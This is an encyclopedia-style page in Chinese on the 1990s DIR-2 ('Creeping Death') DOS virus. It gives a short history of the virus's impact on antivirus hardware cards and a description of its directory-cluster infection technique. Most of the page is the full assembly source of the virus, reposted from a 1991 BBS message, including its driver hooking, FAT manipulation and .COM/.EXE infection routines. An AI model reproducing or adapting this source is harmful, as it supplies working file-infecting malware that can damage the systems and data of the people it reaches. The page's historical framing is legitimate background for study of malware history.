DIR2病毒

DIR2病毒

DIR2病毒,不具有以往人們認定病毒的明顯特徵,它改寫了DOS系統,使自己不被發現,但它確確實實是一個病毒。

介紹

一個可以 媲美CIH的病毒,不具有以往人們認定病毒的明顯特徵,它改寫了DOS系統,使自己不被發現,但它確確實實是一個病毒。

DIR2DIR2
事件

1994年前後,瑞星公司推出了防病毒卡。是用防毒卡好,還是用防毒軟體好?是當時人們爭論的熱點之一。防病毒卡插在電腦里,由於不可改寫,沒有病毒感染的危險,但能否防住未知病毒卻沒有定論。防病毒卡的生產廠家認為能夠找到病毒的最基本特徵,就能夠防住所有已知和未知的病毒。 DIR2 病毒的出現徹底打破了防病毒卡公司的防線,它不具有以往人們認定病毒的明顯特徵,它改寫了DOS系統,使自己不被發現,但它確確實實是一個病毒。
於是,防病毒卡一落千丈,而王江民的 KV300系列卻脫穎而出,以其開放性和快速更新成為殺病毒市場上的盟主。

原理

這種病毒在感染形式和自身結構上與以往引導區型、宿檔案型病毒大不相同。該病毒在軟硬碟中占據小於33兆硬碟最後一個簇的區域。但是,對當今快速發展的各種大容量硬碟,該病毒就計算錯誤,亂感染一通,很難解除。病毒實際上長度為1024、2048位元組。病毒通過DIR或其它讀寫盤命令將當前盤中所有.COM和.EXE檔案目錄登記項中的首簇數修改為病毒認為是磁碟最後一個簇數,這個簇數指向的位置就是病毒在盤中隱藏的位置。

原始碼

===========================================================================
BBS: The Programmer"s Inn
Date: 11-24-91 (19:52) Number: 3544
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO 
Subj: DIR-2 Conf: (16) VIRUS 
---------------------------------------------------------------------------
; Creeping Death V 1.0
;
; (C) Copyright 1991 by VirusSoft Corp.
i13org = 5f8h
i21org = 5fch
org 100h
mov sp,600h
inc counter
xor cx,cx
mov ds,cx
LDS ax,[0c1h]
add ax,21h
push ds
push ax
mov ah,30h
call jump
cmp al,4
SBB si,si
mov drive+2,byte PTR -1
mov bx,60h
mov ah,4ah
call jump
mov ah,52h
call jump
push es:[bx-2]
lds bx,es:[bx]
search: mov ax,[bx+si+15h]
cmp ax,70h
jne next
XCHG ax,cx
mov [bx+si+18h],byte ptr -1
mov di,[bx+si+13h]
mov [bx+si+13h],offset header
mov [bx+si+15h],cs
next: lds bx,[bx+si+19h]
cmp bx,-1
jne search
jcxz install
pop ds
mov ax,ds
add ax,[3]
inc ax
mov dx,cs
dec dx
cmp ax,dx
jne no_boot
add [3],61h
no_boot: mov ds,dx
mov [1],8
mov ds,cx
les ax,[di+6]
mov cs:str_block,ax
mov cs:int_block,es
cld
mov si,1
scan: dec si
lodsw
cmp ax,1effh
jne scan
mov ax,2cah
cmp [si+4],ax
Je right
cmp [si+5],ax
jne scan
right: lodsw
push cs
pop es
mov di,offset modify+1
stosw
xchg ax,si
mov di,offset i13org
cli
movsw
movsw
mov dx,0c000h
fdsk1: mov ds,dx
xor si,si
lodsw
cmp ax,0aa55h
jne fdsk4
CBW
lodsb
mov cl,9
sal ax,cl
fdsk2: cmp [si],6c7h
jne fdsk3
cmp [si+2],4ch
jne fdsk3
push dx
push [si+4]
JMP short death
install: int 20h
file : db "c:",255,0
fdsk3: inc si
cmp si,ax
jb fdsk2
fdsk4: inc dx
cmp dh,0f0h
jb fdsk1
sub sp,4
death: push cs
pop ds
mov bx,[2ch]
mov es,bx
mov ah,49h
call jump
xor ax,ax
test bx,bx
JZ boot
mov di,1
seek: dec di
scasw
jne seek
lea si,[di+2]
jmp short exec
boot: mov es,[16h]
mov bx,es:[16h]
dec bx
xor si,si
exec: push bx
mov bx,offset param
mov [bx+4],cs
mov [bx+8],cs
mov [bx+12],cs
pop ds
push cs
pop es
mov di,offset f_name
push di
mov cx,40
rep movsw
push cs
pop ds
mov ah,3dh
mov dx,offset file
call jump
pop dx
mov ax,4b00h
call jump
mov ah,4dh
call jump
mov ah,4ch
jump: pushf
call dword ptr cs:[i21org]
ret
;--------Installation complete
i13pr: mov ah,3
jmp dword ptr cs:[i13org]
main: push ax ; driver
push cx ; strategy block
push dx
push ds
push si
push di
push es
pop ds
mov al,[bx+2]
cmp al,4 ; Input
je input
cmp al,8
je output
cmp al,9
je output
call in
cmp al,2 ; Build BPB
jne ppp ;
lds si,[bx+12h]
mov di,offset bpb_buf
mov es:[bx+12h],di
mov es:[bx+14h],cs
push es
push cs
pop es
mov cx,16
rep movsw
pop es
push cs
pop ds
mov al,[di+2-32]
cmp al,2
adc al,0
cbw
cmp [di+8-32],0
je m32
sub [di+8-32],ax
jmp short ppp
m32: sub [di+15h-32],ax
sbb [di+17h-32],0
ppp: pop di
pop si
pop ds
pop dx
pop cx
pop ax
rts: retf
output: mov cx,0ff09h
call check
jz inf_sec
call in
jmp short inf_dsk
inf_sec: jmp _inf_sec
read: jmp _read
read_: add sp,16
jmp short ppp
input: call check
jz read
inf_dsk: mov byte ptr [bx+2],4
cld
lea si,[bx+0eh]
mov cx,8
save: lodsw
push ax
loop save
mov [bx+14h],1
call driver
jnz read_
mov byte ptr [bx+2],2
call in
lds si,[bx+12h]
mov ax,[si+6]
add ax,15
mov cl,4
SHR ax,cl
mov di,[si+0bh]
add di,di
stc
adc di,ax
push di
cwd
mov ax,[si+8]
test ax,ax
jnz more
mov ax,[si+15h]
mov dx,[si+17h]
more: xor cx,cx
sub ax,di
sbb dx,cx
mov cl,[si+2]
div cx
cmp cl,2
sbb ax,-1
push ax
call convert
mov byte ptr es:[bx+2],4
mov es:[bx+14h],ax
call driver
again: lds si,es:[bx+0eh]
add si,dx
sub dh,cl
adc dx,ax
mov cs:gad+1,dx
cmp cl,1
je small
mov ax,[si]
and ax,di
cmp ax,0fff7h
je bad
cmp ax,0ff7h
je bad
cmp ax,0ff70h
jne ok
bad: pop ax
dec ax
push ax
call convert
jmp short again
small: not di
and [si],di
pop ax
push ax
inc ax
push ax
mov dx,0fh
test di,dx
jz here
inc dx
mul dx
here: or [si],ax
pop ax
call convert
mov si,es:[bx+0eh]
add si,dx
mov ax,[si]
and ax,di
ok: mov dx,di
dec dx
and dx,di
not di
and [si],di
or [si],dx
cmp ax,dx
pop ax
pop di
mov cs:pointer+1,ax
je _read_
mov dx,[si]
push ds
push si
call write
pop si
pop ds
jnz _read_
call driver
cmp [si],dx
jne _read_
dec ax
dec ax
mul cx
add ax,di
adc dx,0
push es
pop ds
mov [bx+12h],2
mov [bx+14h],ax
test dx,dx
jz less
mov [bx+14h],-1
mov [bx+1ah],ax
mov [bx+1ch],dx
less: mov [bx+10h],cs
mov [bx+0eh],100h
call write
_read_: std
lea di,[bx+1ch]
mov cx,8
load: pop ax
stosw
loop load
_read: call in
mov cx,9
_inf_sec:
mov di,es:[bx+12h]
lds si,es:[bx+0eh]
sal di,cl
xor cl,cl
add di,si
xor dl,dl
push ds
push si
call find
jcxz no_inf
call write
and es:[bx+4],byte ptr 07fh
no_inf: pop si
pop ds
inc dx
call find
jmp ppp
;--------Subroutines
find: mov ax,[si+8]
cmp ax,"XE"
jne com
cmp [si+10],al
je found
com: cmp ax,"OC"
jne go_on
cmp byte ptr [si+10],"M"
jne go_on
found: test [si+1eh],0ffc0h ; >4MB
jnz go_on
test &#91;si+1dh&#93;,03ff8h ; <2048B
jz go_on
test &#91;si+0bh&#93;,byte ptr 1ch
jnz go_on
test dl,dl
jnz rest
pointer: mov ax,1234h
cmp ax,&#91;si+1ah&#93;
je go_on
xchg ax,&#91;si+1ah&#93;
gad: xor ax,1234h
mov &#91;si+14h&#93;,ax
loop go_on
rest: xor ax,ax
xchg ax,&#91;si+14h&#93;
xor ax,cs:gad+1
mov &#91;si+1ah&#93;,ax
go_on: ;ROL cs:gad+1,1
db 2eh,0d1h,6
dw offset gad+1
add si,32
cmp di,si
jne find
ret
check: mov ah,&#91;bx+1&#93;
drive: cmp ah,-1
mov cs:&#91;drive+2&#93;,ah
jne changed
push &#91;bx+0eh&#93;
mov byte ptr &#91;bx+2&#93;,1
call in
cmp byte ptr &#91;bx+0eh&#93;,1
pop &#91;bx+0eh&#93;
mov &#91;bx+2&#93;,al
changed: ret
write: cmp byte ptr es:&#91;bx+2&#93;,8
jae in
mov byte ptr es:&#91;bx+2&#93;,4
mov si,70h
mov ds,si
modify: mov si,1234h
push &#91;si&#93;
push &#91;si+2&#93;
mov &#91;si&#93;,offset i13pr
mov &#91;si+2&#93;,cs
call in
pop &#91;si+2&#93;
pop &#91;si&#93;
ret
driver: mov es:&#91;bx+12h&#93;,1
in:
db 09ah
str_block:
dw ?,70h
db 09ah
int_block:
dw ?,70h
test es:&#91;bx+4&#93;,byte ptr 80h
ret
convert: cmp ax,0ff0h
jae fat_16
mov si,3
xor cs:&#91;si+gad-1&#93;,si
mul si
shr ax,1
mov di,0fffh
jnc cont
mov di,0fff0h
jmp short cont
fat_16: mov si,2
mul si
mov di,0ffffh
cont: mov si,512
div si
header: inc ax
ret
counter: dw 0
dw 842h
dw offset main
dw offset rts
db 7fh
param: dw 0,80h,?,5ch,?,6ch,?
bpb_buf: db 32 dup(?)
f_name: db 80 dup(?)
;--------The End.

相關詞條

相關搜尋

熱門詞條

聯絡我們